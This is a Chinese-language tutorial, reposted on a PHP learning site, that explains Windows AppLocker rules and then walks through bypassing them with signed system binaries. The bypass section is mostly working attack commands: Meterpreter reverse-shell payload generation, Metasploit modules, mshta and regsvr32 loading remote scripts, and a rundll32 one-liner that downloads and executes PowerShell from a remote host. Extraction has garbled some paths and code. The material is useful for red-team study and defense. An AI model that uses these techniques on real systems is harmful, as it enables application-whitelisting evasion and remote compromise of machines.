如何進行AppLocker繞過分析

前言

什么是applocker

applocker即“應用程序控制策略”,是windows 7系統中新增加的一項安全功能。在win7以上的系統中默認都集成了該功能,我們可以使用在services中啟用application identity,然后在local security policy中找到application control policies中看到applocker選項。

applocker規則

默認的Applocker規則支持以下幾種:

規則** | 關聯的文件格式 —|— 可執行文件 ?| .exe、.com 腳本 | .ps1、.bat、.cmd、.vbs、.js Windows Installer 文件 | .msi、.msp、.mst 封裝應用和封裝應用安裝程序 | .appx DLL 文件 |  .dll、.ocx

.appx并不是所有的applocker都會存在,應根據windows版本來,在win10上,創建applocker規則后會在C:WindowsSystem32AppLocker生產相應的.applocker文件。

applocker規則條件

規則條件是用于幫助 AppLocker 標識要應用規則的應用的標準。三個主要規則條件為發布者、路徑和文件哈希。

  • 發布者:基于應用的數字簽名標識它

  • 路徑:通過應用在計算機文件系統中或網絡上的位置來標識它

  • 文件哈希:表示已標識文件的系統計算的加密哈希

如何進行AppLocker繞過分析

AppLocker 默認規則

在你創建了一個applocker規則后,系統會默認詢問你是否添加一條默認規則,如下圖所示:

如何進行AppLocker繞過分析

每個規則所對應的默認規則如下:

可執行的默認規則類型包括:

  • 允許本地 Administrators 組的成員運行所有應用。

  • 允許 Everyone 組的成員運行 Windows 文件夾中的應用。

  • 允許 Everyone 組的成員運行 Program Files 文件夾中的應用。

腳本默認規則類型包括:

  • 允許本地 Administrators 組的成員運行所有腳本。

  • 允許 Everyone 組的成員運行 Program Files 文件夾中的腳本。

  • 允許 Everyone 組的成員運行 Windows 文件夾中的腳本。

Windows Installer 默認規則類型包括:

  • 允許本地 Administrators 組的成員運行所有 Windows Installer 文件。

  • 允許 Everyone 組的成員運行所有已進行數字簽名的 Windows Installer 文件。

  • 允許 Everyone 組的成員運行 WindowsInstaller 文件夾中的所有 Windows Installer 文件。

DLL 默認規則類型:

  • 允許本地 Administrators 組的成員運行所有 DLL。

  • 允許 Everyone 組的成員運行 Program Files 文件夾中的 DLL。

  • 允許 Everyone 組的成員運行 Windows 文件夾中的 DLL。

封裝應用默認規則類型:

  • 允許 Everyone 組的成員安裝和運行所有已簽名的封裝應用和封裝應用安裝程序

AppLocker 規則行為

可將規則配置為使用允許或拒絕操作:

  • 允許。你可以指定允許在你的環境中運行的文件以及所針對的用戶或用戶組。你還可以配置例外以標識從規則中排除的文件。

  • 拒絕。你可以指定 not 允許在你的環境中運行的文件以及所針對的用戶或用戶組。你還可以配置例外以標識從規則中排除的文件。

如何進行AppLocker繞過分析

創建一個applocker規則

講了那么多,我們以禁止在桌面上運行exe文件為例,創建一條規則。創建完大體如下:

如何進行AppLocker繞過分析

運行exe測試:

如何進行AppLocker繞過分析

系統就會阻止我們運行

bypass Applocker

Installutil.exe

InstallUtil是.NET Framework的一部分,是一個命令行程序,它使用戶可以通過命令提示符快速安裝和卸載應用程序。由于此實用程序是Microsoft簽名的二進制文件,因此可以用來繞過AppLocker限制來運行任何.NET可執行文件。該實用程序也位于Windows文件夾內,該文件夾不會應用AppLocker策略,因為需要執行Windows文件夾的內容才能使系統正常運行。

首先我們使用WhiteListEvasion(https://github.com/khr0x40sh/WhiteListEvasion)生成一個模板

<br/>
<br/>

python InstallUtil.py –cs_file pentestlab.cs –exe_file /root/Desktop/pentestlab.exe –payload windows/meterpreter/reverse_https –lhost 192.168.0.103 –lport 443

如何進行AppLocker繞過分析

上面的命令將生成一個C#模板,其中將包含Metasploit ShellCode。

將生成后的文件放到目標中使用下面的方法執行:

<br/>
<br/>

C:WindowsMicrosoft.NETFrameworkv2.0.50727InstallUtil.exe /logfile= /LogToConsole=false /U /root/payload.exe

當然你也可以是先使用msf生成一個csharp的payload,然后替換模板中的shellcode,然后將cs文件傳到目標機。

然后用csc編譯我們的腳本:

<br/>
<br/>

C:WindowsMicrosoft.NETFrameworkv2.0.50727csc.exe ?/out:exeshell.exe exeshell.cs

如何進行AppLocker繞過分析

此時我們執行我們的文件試試:

如何進行AppLocker繞過分析

被規則攔截,那么我們使用

<br/>
<br/>

C:WindowsMicrosoft.NETFrameworkv2.0.50727InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

繞過

如何進行AppLocker繞過分析

msf成功上線

如何進行AppLocker繞過分析

在msf中也有使用InstallUtil.exe進行applocker的bypass模塊。

<br/>
<br/>

exploit/windows/local/applocker_bypass

原理是一樣的

如何進行AppLocker繞過分析

附帶常見的路徑:

  • C:WindowsMicrosoft.NETFrameworkv2.0.50727InstallUtil.exe

  • C:WindowsMicrosoft.NETFramework64v2.0.50727InstallUtil.exe

  • C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe

  • C:WindowsMicrosoft.NETFramework64v4.0.30319InstallUtil.exe

Msbuild.exe

MSBuild.exe(Microsoft Build Engine)是visual studio使用的軟件構建平臺。它采用XML格式的項目文件,這些文件定義了構建各種平臺和配置的要求。(引用:MSDN MSBuild)

我們可以使用MSBuild通過受信任的Windows實用工具代理代碼執行。.NET版本4中引入的MSBuild內聯任務功能允許將C#代碼插入XML項目文件中。內聯任務MSBuild將編譯并執行內聯任務。MSBuild.exe是一個經過簽名的Microsoft二進制文件,因此,以這種方式使用它時,它可以執行任意代碼,并繞過配置為允許MSBuild.exe執行的應用程序白名單防護.

我們這里直接使用GreatSCT生成一個xml文件。

<br/>
<br/>

./GreatSCT.py –ip 192.168.0.106 –port 4444 -t bypass -p msbuild/meterpreter/rev_tcp.py

如何進行AppLocker繞過分析

并且會給我們生成一個rc文件,我們可以使用msfconsole -r 直接啟動msf

然后使用msbuild執行,

如何進行AppLocker繞過分析

msf上線:

如何進行AppLocker繞過分析

當然你也可以是使用msf生成一個c#的shellcode然后使用三好學生師傅的模板加載:

https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20shellcode.xml

注意將后綴名改為.csproj

除了反彈shell以外我們還可以用它來繞過powershell的限制。

如何進行AppLocker繞過分析

代碼如下:

<br/>
<br/>

? ? ? ? ? ? ? ? ? ? ? ? ? ? ?"); ? ? ? ? ? ? ? ? ? ? ? ?string x = Console.ReadLine(); ? ? ? ? ? ? ? ? ? ? ? ?try ? ? ? ? ? ? ? ? ? ? ? ?{ ? ? ? ? ? ? ? ? ? ? ? ? ? ?Console.WriteLine(RunPSCommand(x)); ? ? ? ? ? ? ? ? ? ? ? ?} ? ? ? ? ? ? ? ? ? ? ? ?catch (Exception e) ? ? ? ? ? ? ? ? ? ? ? ?{ ? ? ? ? ? ? ? ? ? ? ? ? ? ?Console.WriteLine(e.Message); ? ? ? ? ? ? ? ? ? ? ? ?} ? ? ? ? ? ? ? ? ? ?} ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?return true; ? ? ? ? ? ? ? ?} ? ? ? ? ? ? ? ?//Based on Jared Atkinson's And Justin Warner's Work ? ? ? ? ? ? ? ?public static string RunPSCommand(string cmd) ? ? ? ? ? ? ? ?{ ? ? ? ? ? ? ? ? ? ?//Init stuff ? ? ? ? ? ? ? ? ? ?Runspace runspace = RunspaceFactory.CreateRunspace(); ? ? ? ? ? ? ? ? ? ?runspace.Open(); ? ? ? ? ? ? ? ? ? ?RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace); ? ? ? ? ? ? ? ? ? ?Pipeline pipeline = runspace.CreatePipeline(); ? ? ? ? ? ? ? ? ? ?//Add commands ? ? ? ? ? ? ? ? ? ?pipeline.Commands.AddScript(cmd); ? ? ? ? ? ? ? ? ? ?//Prep PS for string output and invoke ? ? ? ? ? ? ? ? ? ?pipeline.Commands.Add("Out-String"); ? ? ? ? ? ? ? ? ? ?Collection<psobject> results = pipeline.Invoke(); ? ? ? ? ? ? ? ? ? ?runspace.Close(); ? ? ? ? ? ? ? ? ? ?//Convert records to strings ? ? ? ? ? ? ? ? ? ?StringBuilder stringBuilder = new StringBuilder(); ? ? ? ? ? ? ? ? ? ?foreach (PSObject obj in results) ? ? ? ? ? ? ? ? ? ?{ ? ? ? ? ? ? ? ? ? ? ? ?stringBuilder.Append(obj); ? ? ? ? ? ? ? ? ? ?} ? ? ? ? ? ? ? ? ? ?return stringBuilder.ToString().Trim(); ? ? ? ? ? ? ? ? } ? ? ? ? ? ? ? ? public static void RunPSFile(string script) ? ? ? ? ? ? ? ?{ ? ? ? ? ? ? ? ? ? ?PowerShell ps = PowerShell.Create(); ? ? ? ? ? ? ? ? ? ?ps.AddScript(script).Invoke(); ? ? ? ? ? ? ? ?} ? ? ? ? ? ?} ? ? ? ?]]&gt; ?</psobject> ?

原地址:https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20PowerShellCommands.xml

如何進行AppLocker繞過分析

成功繞過對powershell的限制。

常見路徑如下:

  • C:WindowsMicrosoft.NETFrameworkv2.0.50727Msbuild.exe

  • C:WindowsMicrosoft.NETFramework64v2.0.50727Msbuild.exe

  • C:WindowsMicrosoft.NETFrameworkv3.5Msbuild.exe

  • C:WindowsMicrosoft.NETFramework64v3.5Msbuild.exe

  • C:WindowsMicrosoft.NETFrameworkv4.0.30319Msbuild.exe

  • C:WindowsMicrosoft.NETFramework64v4.0.30319Msbuild.exe

Mshta.exe

mshta.exe是微軟Windows操作系統相關程序,英文全稱Microsoft HTML Application,可翻譯為微軟超文本標記語言應用,用于執行.HTA文件。默認已集成在環境變量中。

使用Mshta的方式有很多,我們這里使用msf的exploit/windows/misc/hta_server模塊進行測試:

<br/>
<br/>

use exploit/windows/misc/hta_server msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109 msf exploit(windows/misc/hta_server) > exploit

如何進行AppLocker繞過分析

目標機執行:

<br/>
<br/>

mshta.exe http://192.168.0.106:8080/JR1gb3TO6.hta

即可上線。

除了這種方法hta還可以使用cobaltstrike 、Setoolkit、Magic unicorn、Empire、CactusTorch、Koadic、Great SCT等進行上線。

除了本地文件,mshta還支持遠程下載的方式執行payload,比如:

<br/>
<br/>

mshta.exe javascript:a=GetObject(“script:https://gist.github.com/someone/something.sct”).Exec();close();

除了以上的方式,mshta可以用用來執行powershell:

<br/>
<br/>

即使applocker已經禁止powershell執行了

如何進行AppLocker繞過分析

InfDefaultInstall.exe

InfDefaultInstall.exe是一個用來進行inf安裝的工具,具有微軟簽名,存在路徑為:

  • C:WindowsSystem32Infdefaultinstall.exe

  • C:WindowsSysWOW64Infdefaultinstall.exe

我們也可以用它來繞過一些限制。用法就是直接該文件后面跟你的inf文件即可。

它的執行流程如下:

如何進行AppLocker繞過分析

作者給出的poc地址如下:

https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a

思路也和圖中那樣,使用shady.inf去調用遠程的sct后門。

不過他的調用需要更高的權限,我在win10下運行的截圖:

如何進行AppLocker繞過分析

Mavinject.exe

Mavinject是win10上面自帶的windows組件,我們可以用它來進行dll注入,并繞過部分限制。

用法如下:

<br/>
<br/>

mavinject32.exe

常見路徑如下:

  • C:Program FilesCommon Filesmicrosoft sharedClickToRunMavInject32.exe

  • C:WindowsSystem32mavinject.exe

  • C:WindowsSysWOW64mavinject.exe

但是我本地復現的時候并沒有成功注入,但是也沒有什么提示,不知道具體原因是什么,版本為: ? ? 10.0.15063.0 (WinBuild.160101.0800)

應該是可以成功注入的,附上一張推特大佬成功的圖。

如何進行AppLocker繞過分析

有興趣的可以多嘗試幾個系統。

MSIEXEC

MSIEXEC是Microsoft的應用程序,可用于從命令行安裝或配置產品。這個其實不是很陌生的了,我之前也寫過用它來進行提權的文章。我們假設可以執行msi文件,用它來繞過applocker對powershell的限制。

先用msf生成一個msi文件。

<br/>
<br/>

msfvenom -f msi -p windows/exec CMD=powershell.exe > powershell.msi

如何進行AppLocker繞過分析

windows下執行:

如何進行AppLocker繞過分析

成功繞過。

msxsl.exe

msxsl.exe是一個xml的轉換器,帶有微軟數字簽名。下載地址如下:

https://www.microsoft.com/en-us/download/details.aspx?id=21714

如何進行AppLocker繞過分析

我們使用3gstudent來嘗試繞過applocker對calc的限制,

customers.xml:

<br/>
<br/>

? ?John Smith ?

123 Elm St.

?(123) 456-7890 ? ? ?Mary Jones ?

456 Oak Ave.

?(156) 789-0123 ?

script.xml:

<br/>
<br/>

成功繞過:

如何進行AppLocker繞過分析

當然也可以執行我們的shellcode,具體參考:

https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml

Regsv***.exe

regsv***是Windows命令行實用程序,用于將.dll文件和ActiveX控件注冊和注銷到注冊表中。

文件位置:

  • C:WindowsSystem32regsv***.exe

  • C:WindowsSysWOW64regsv***.exe

下面為大家演示,繞過applocker上線。

如何進行AppLocker繞過分析

如何進行AppLocker繞過分析

scT文件內容如下:

<br/>
<br/>

各參數的含義:

  • 靜默不顯示任何消息// / s

  • 不調用DLL注冊服務器// / n

  • 要使用另一個IP地址,因為它不會調用DLL注冊服務器// / i

  • 使用取消注冊方法// / u

除了本地執行,它還支持遠程加載:

<br/>
<br/>

regsv*** /u /n /s /i:http://ip:port/payload.sct scrobj.dll

sct我們使用GreatSct生成即可。

Rundll32.exe

Rundll32是一個Microsoft二進制文件,可以執行DLL文件中的代碼。由于此實用程序是Windows操作系統的一部分,因此可以用作繞過AppLocker規則或軟件限制策略的方法

先生成我們的payload:

如何進行AppLocker繞過分析

目標機執行:    

rundll32.exe javascript:"..mshtml,RunHTMLApplication "; document.write(); new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"

上線:

如何進行AppLocker繞過分析

除了遠程之外,也可以本地上線:

rundll32 shell32.dll,Control_RunDLL C:Userspentestlab.dll

也可以用來繞過對某些軟件的限制,比如彈個cmd:

如何進行AppLocker繞過分析

如何進行AppLocker繞過分析

最佳 Windows 性能的頂級免費優化軟件

每個人都需要一臺速度更快、更穩定的 PC。隨著時間的推移,垃圾文件、舊注冊表數據和不必要的后臺進程會占用資源并降低性能。幸運的是,許多工具可以讓 Windows 保持平穩運行。

下載

來源:億速云網

如何進行AppLocker繞過分析

本文內容由網友自發貢獻,版權歸原作者所有,本站不承擔相應法律責任。如您發現有涉嫌抄襲侵權的內容,請聯系admin@php.cn

最新問題

如何進行AppLocker繞過分析廣告

熱門教程

更多>

最新下載

更多>

網站特效

網站源碼

網站素材

前端模板

關于我們 免責申明 意見反饋 講師合作 廣告合作 最新更新

php中文網:公益在線php培訓,幫助PHP學習者快速成長!
關注服務號

技術交流群

如何進行AppLocker繞過分析

PHP中文網訂閱號
每天精選資源文章推送
如何進行AppLocker繞過分析

PHP中文網APP
隨時隨地碎片化學習
如何進行AppLocker繞過分析

PHP中文網抖音號
發現有趣的

Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP備2023035733號

  • PHP學習

  • 技術支持

  • 返回頂部

  • ? 版權聲明
    THE END
    互聯網運維
    # visual studio
    喜歡就支持一下吧
    點贊6 分享
    相關推薦